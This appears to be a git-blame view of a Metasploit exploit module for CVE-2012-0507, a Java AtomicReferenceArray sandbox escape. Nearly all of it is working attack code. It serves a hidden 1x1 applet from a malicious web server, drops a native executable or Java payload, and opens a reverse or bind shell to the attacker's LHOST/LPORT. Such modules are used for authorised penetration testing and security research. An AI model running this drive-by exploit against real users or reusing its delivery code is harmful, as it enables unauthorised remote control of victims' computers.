Files
metasploit-gs/modules/exploits/multi/browser/java_atomicreferencearray.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

172 lines
5.2 KiB
Ruby
Raw Normal View History

2012-03-29 10:31:14 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-03-29 10:31:14 -05:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2012-03-29 10:31:14 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def initialize( info = {} )
super( update_info( info,
2012-03-30 02:06:56 -05:00
'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',
'Description' => %q{
2012-03-29 10:31:14 -05:00
This module exploits a vulnerability due to the fact that
AtomicReferenceArray uses the Unsafe class to store a reference in an
array directly, which may violate type safety if not used properly.
This allows a way to escape the JRE sandbox, and load additional classes
in order to perform malicious operations.
},
2012-03-30 02:06:56 -05:00
'License' => MSF_LICENSE,
'Author' =>
2012-03-29 10:31:14 -05:00
[
'Jeroen Frijters', #Initial discovery according to his blog
'sinn3r', # metasploit module
'juan vazquez', # metasploit module
'egypt' # added support for older java versions
2012-03-29 10:31:14 -05:00
],
'References' =>
[
['CVE', '2012-0507'],
['OSVDB', '80724'],
2012-03-29 10:31:14 -05:00
['BID', '52161'],
['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
2012-04-01 01:30:50 -05:00
['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'],
2022-01-23 15:28:32 -05:00
['URL', 'https://www.rapid7.com/blog/post/2012/03/29/cve-2012-0507--java-strikes-again']
2012-03-29 10:31:14 -05:00
],
'Platform' => %w{ java linux osx solaris win },
2012-03-30 02:06:56 -05:00
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
2012-03-29 10:31:14 -05:00
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2012-02-14'
2012-03-29 10:31:14 -05:00
))
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def exploit
# load the static jar file
2013-09-26 20:34:48 +01:00
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2012-0507.jar" )
2012-03-29 10:31:14 -05:00
fd = File.open( path, "rb" )
@jar_data = fd.read(fd.stat.size)
fd.close
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
super
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def on_request_uri( cli, request )
2012-03-30 02:06:56 -05:00
data = ""
host = ""
port = ""
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect( cli, get_resource() + '/', '')
return
end
2013-08-30 16:28:54 -05:00
2012-04-20 13:31:42 -06:00
print_status("Sending #{self.name}")
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
payload = regenerate_payload( cli )
if not payload
2012-04-20 13:31:42 -06:00
print_error("Failed to generate the payload." )
2012-03-29 10:31:14 -05:00
return
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
jar = payload.encoded
host = datastore['LHOST']
port = datastore['LPORT']
2012-04-25 15:01:50 -05:00
vprint_status("Sending java reverse shell")
2012-03-29 10:31:14 -05:00
else
port = datastore['LPORT']
2014-04-14 22:17:31 -05:00
host = cli.peerhost
2012-04-25 15:01:50 -05:00
vprint_status( "Java bind shell" )
2012-03-29 10:31:14 -05:00
end
if jar
print_status( "Generated jar to drop (#{jar.length} bytes)." )
jar = Rex::Text.to_hex( jar, prefix="" )
else
2012-04-20 13:31:42 -06:00
print_error("Failed to generate the executable." )
2012-03-29 10:31:14 -05:00
return
end
else
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
2013-08-30 16:28:54 -05:00
print_status("Generated executable to drop (#{data.length} bytes)." )
data = Rex::Text.to_hex( data, prefix="" )
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
return
end
2013-08-30 16:28:54 -05:00
2012-04-20 13:31:42 -06:00
print_status("Sending jar")
2012-03-29 10:31:14 -05:00
send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
handler( cli )
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def generate_html( data, jar, host, port )
2012-03-30 02:06:56 -05:00
jar_name = rand_text_alpha(rand(6)+3) + ".jar"
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
html = "<html><head></head>"
html += "<body>"
2012-03-30 02:06:56 -05:00
html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
2012-03-29 10:31:14 -05:00
html += "<param name=\"data\" value=\"#{data}\"/>" if data
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
html += "</applet></body></html>"
return html
end
2013-08-30 16:28:54 -05:00
2012-03-29 10:31:14 -05:00
def generate_jar()
return @jar_data
end
end